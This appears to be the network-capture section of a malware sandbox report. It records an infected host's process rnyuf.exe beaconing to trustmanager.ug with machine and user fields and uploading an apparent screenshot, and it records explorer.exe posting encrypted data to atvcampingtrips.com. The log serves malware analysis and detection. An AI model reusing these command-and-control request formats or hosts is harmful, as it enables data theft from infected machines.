Aug 23, 2021 02:08:11.113852024 CEST	2852	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 5a 4b f9 e0 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuZKz>jpj<ts!r-3YD2@NZC\]TXJ6r?/
Aug 23, 2021 02:08:12.067374945 CEST	2852	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:11 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 43 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 58 b5 ad 1e bd cc b6 f2 6d 9d 20 d1 fd 3b 14 05 84 9a Data Ascii: #\(R9lXm ;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.3	49816	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:06.458566904 CEST	16671	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:06.486041069 CEST	16673	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:06.486083031 CEST	16673	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.3	49817	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:07.619990110 CEST	16675	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: atvcampingtrips.com
Aug 23, 2021 02:09:07.620006084 CEST	16675	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 2d 25 d0 99 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vu-%63pnc@]'4(9L9M\6P]5`o{MpqvQM
Aug 23, 2021 02:09:08.856391907 CEST	17069	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:08 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.3	49818	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:07.709634066 CEST	16676	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:07.735488892 CEST	16677	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:07.735507011 CEST	16677	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.3	49819	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:07.741775990 CEST	16678	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:07.741919994 CEST	16678	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:07.742336988 CEST	16688	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:07.742422104 CEST	16690	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:07.767704964 CEST	16693	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:07.767760992 CEST	16696	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:07.767801046 CEST	16699	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:07.767823935 CEST	16702	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:07.767879963 CEST	16704	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:07.767920971 CEST	16707	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:07.767952919 CEST	16711	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:07.846566916 CEST	16774	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 